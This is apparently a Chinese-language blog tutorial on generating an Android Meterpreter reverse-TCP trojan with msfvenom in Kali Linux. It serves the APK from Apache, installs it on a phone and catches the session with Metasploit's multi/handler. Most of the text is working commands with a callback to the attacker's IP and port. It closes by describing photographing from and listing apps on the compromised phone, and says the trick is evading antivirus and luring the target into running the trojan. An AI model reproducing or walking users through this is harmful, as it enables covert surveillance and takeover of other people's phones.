kali_msf6_渗透

奶奶曾说过,证明自己学懂的方式就是教会别人。

工具简介:

msf全称Metasploit是H.D. Moore在2003年开发的,它是少数几个可用于执行诸多渗透测试步骤的工具。在发现新漏洞时(这是很常见的),Metasploit会监控Rapid7,然后Metasploit的200,000多个用户会将漏洞添加到Metasploit的目录上。然后,任何人只要使用Metasploit,就可以用它来测试特定系统的是否有这个漏洞。

通俗来说msf就是一个渗透的工具包,初学者可以从kali开始了解,因为kali的工具含量对于初学者来讲,还是比较广的,给我们去了解渗透工作,足够。

作者环境:

kali2020:版本没啥说的,至少用跟你现在电脑兼容的吧,下载链接已奉上

kali_msf6_渗透_第1张图片 Get Kali | Kali Linux

局域网:kali的网卡与主机网卡要共享,并且主机与目标机在同一个局域网内

kali_msf6_渗透_第2张图片

下面开始操作: 

生成监听木马

 kali_msf6_渗透_第3张图片

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.5.100 LPORT=5000 R > test.apk
             #       msf的模块                    kali的ip       kali的端口      生成文件

 注意我们代码此时的路径在/home/lqx/桌面,这样我们生成的文件可以在桌面直接看到

将木马下载到手机

通过kali的apache服务将文件上传至服务器,而手机则通过kali的ip地址登陆服务器并下载木马。

/etc/init.d/apache2 start #开启apache服务

 将刚刚生成的文件移动到/etc/www/html目录下,并删除此路径下的index.html文件

kali_msf6_渗透_第4张图片

mv test.apk /var/www/html
#将test.apk文件移动到/var/www/html路径下
cd /var/www/html
#切换窗口的操作路径
rm index.html
#删除index.html文件

我们在浏览器输入kali的ip地址并下载测试用的木马文件

 kali_msf6_渗透_第5张图片

kali_msf6_渗透_第6张图片因为没有做防杀,所以立刻就被系统检测,不用担心我们“继续安装”。

kali_msf6_渗透_第7张图片安装完成后,我们直接运行它。因为生成的是纯木马文件没有任何伪装,运行了也不会有‘任何效果’

开启msf

before

after

msfconsole  #开启msf

配置参数

kali_msf6_渗透_第8张图片 成功建立会话后进入meterpreter
use multi/handler

set payload android/meterpreter/reverse_tcp
set LHOST 192.168.5.100    #kali的ip
set LPORT 5000           #kali的端口
#与前面配置木马时的host、port参数一致

run
#开始监听

 测试渗透结果:

其实到这里我们就已经成功了,接下里我们可以在kali上对手机进行,拍照,查看app,等不可描述的操作,究其原理就是木马够接地气不被杀毒软件检测,其次诱导目标运行。

app_list #查看手机安装的app

 kali_msf6_渗透_第9张图片

你可能感兴趣的:(kali,安全,web安全,kali,linux)